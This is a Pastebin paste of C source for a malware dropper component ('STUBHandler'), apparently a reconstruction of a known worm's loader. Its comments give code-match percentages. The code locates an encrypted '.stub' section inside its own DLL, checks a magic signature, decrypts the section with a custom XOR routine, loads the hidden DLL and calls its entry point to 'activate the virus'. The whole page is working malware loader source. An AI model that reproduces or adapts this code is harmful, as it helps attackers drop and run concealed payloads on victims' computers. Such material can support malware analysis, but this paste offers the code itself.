Advertisement
FlyFar

dropper_STUBHandler

Feb 18th, 2023
517
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.28 KB | Cybersecurity | 0 0
  1. #include "2. STUBHandler.h"
  2. #include "6. MemorySections.h"
  3.  
  4. #include "config.h"
  5. #include "define.h"
  6.  
  7. // 99% (C) CODE MATCH
  8. void Core_Load(void)
  9. {
  10.     INT32 nCoreLen;         // Length of the section which contains the main DLL
  11.     LPVOID lpCore;          // The pointer to the section which contains the main DLL
  12.     HMODULE hCoreModule;    // The pointer to the loaded main DLL
  13.     TCoreHeader *h;         // Pointer to the header
  14.  
  15.     // Get the pointer to the section
  16.     if(!Core_GetDLL(&lpCore, &nCoreLen))
  17.         return;
  18.    
  19.     // Get the header
  20.     h = (TCoreHeader *)lpCore;
  21.    
  22.     // Decode the section
  23.     Core_Crypt((BYTE *)((DWORD)lpCore + h->HeaderLength), h->SectionLength);
  24.    
  25.     // Setup everything and get ready to activate the virus
  26.     if(Setup(NULL, (LPVOID)((DWORD)lpCore + h->HeaderLength), h->SectionLength, &hCoreModule))
  27.         return;
  28.    
  29.     // Activate the virus
  30. #   define DLL_FUNC(p, a, b)    { if(p) ((__tLibraryExecEntry)p)(a, b); }
  31.     DLL_FUNC(GetProcAddress(hCoreModule, ENTRY_FUNC), lpCore, nCoreLen);
  32.    
  33.     FreeLibrary(hCoreModule);
  34. }
  35.  
  36. // 98% (C) CODE MATCH
  37. void Core_Crypt(BYTE *lpStream, DWORD dwLength)
  38. {
  39.     DWORD i = 4, k, j, l;
  40.    
  41.     for(; i >= 0; i--)
  42.     {
  43.         for(k = 0; k < dwLength; k++)
  44.             lpStream[k] ^= X_CORE_KEY * k;
  45.        
  46.         for(j = 0; j < dwLength / 2; j++)
  47.             lpStream[j] ^= lpStream[((dwLength + 1) / 2) + j];
  48.        
  49.         for(l = dwLength - 1; l >= 1; l--)
  50.             lpStream[l] -= lpStream[l - 1];
  51.     }
  52. }
  53.  
  54. extern HINSTANCE g_hInstDLL;
  55.  
  56. // 85% (C) CODE MATCH -> NEED DEBUG
  57. BOOL Core_GetDLL(LPVOID *ppCore, INT32 *pCoreLen)
  58. {
  59.     PIMAGE_NT_HEADERS pImageNT;
  60.     PIMAGE_SECTION_HEADER pImageSection;
  61.     INT32 i;
  62.     DWORD nCoreLen;
  63.     LPVOID lpCore;
  64.    
  65.     // Check the DOS header of the DLL (must be "MZ")
  66.     if(((PIMAGE_DOS_HEADER)g_hInstDLL)->e_magic != MZ_HEADER)
  67.         return FALSE;
  68.    
  69.     // Get the pointer to the PE header
  70.     pImageNT = IMAGE_NT(g_hInstDLL);
  71.    
  72.     // Check the PE header (must be "PE")
  73.     if(pImageNT->Signature != PE_HEADER)
  74.         return FALSE;
  75.    
  76.     // Get the PE Section Table
  77.     pImageSection = SECTION_TABLE(pImageNT);
  78.     i = 0;
  79.    
  80.     // Get the number of sections (5), if it is 0
  81.     // or negative the function fails
  82.     if(pImageNT->FileHeader.NumberOfSections <= 0)
  83.         return FALSE;
  84.    
  85.     // Search the section ".stub" where the encrypted dll
  86.     // is allocated, if not found the function failed
  87.     while(lstrcmpiA((LPCSTR)pImageSection->Name, X_SECTION_NAME))
  88.     {
  89.         ++i; ++pImageSection;
  90.        
  91.         // Index out of range
  92.         if(i >= pImageNT->FileHeader.NumberOfSections)
  93.         {
  94.             DEBUG_P("The core section has not been found.")
  95.             return FALSE;
  96.         }
  97.     }
  98.    
  99.     // Get the ".stub" section Virtual Size
  100.     nCoreLen = pImageSection->SizeOfRawData; // (503.808 bytes)
  101.    
  102.     // Check if the Virtual Size is not too small (VirtualSize < 556)
  103.     if(nCoreLen < sizeof(TCoreHeader) + sizeof(DWORD))
  104.     {
  105.         DEBUG_P("The core is too small.")
  106.         return FALSE;
  107.     }
  108.    
  109.     // Get the ".stub" section RVA (Relative Virtual Address) (g_hInstDLL + 0x6000)
  110.     lpCore = (LPVOID)(g_hInstDLL + pImageSection->VirtualAddress);
  111.    
  112.     // Check the header (DWORD) of the RVA section (0xAE39120D)
  113.     if(*(DWORD *)lpCore != X_SIGNATURE)
  114.     {
  115.         DEBUG_P("The core has an invalid signature.")
  116.         return FALSE;
  117.     }
  118.    
  119.     // Remove the header (4 bytes) and put the values in the pointers
  120.     *ppCore     = (LPVOID)((DWORD)lpCore + sizeof(DWORD));
  121.     *pCoreLen   = nCoreLen - sizeof(DWORD);
  122.    
  123.     return TRUE;
  124. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement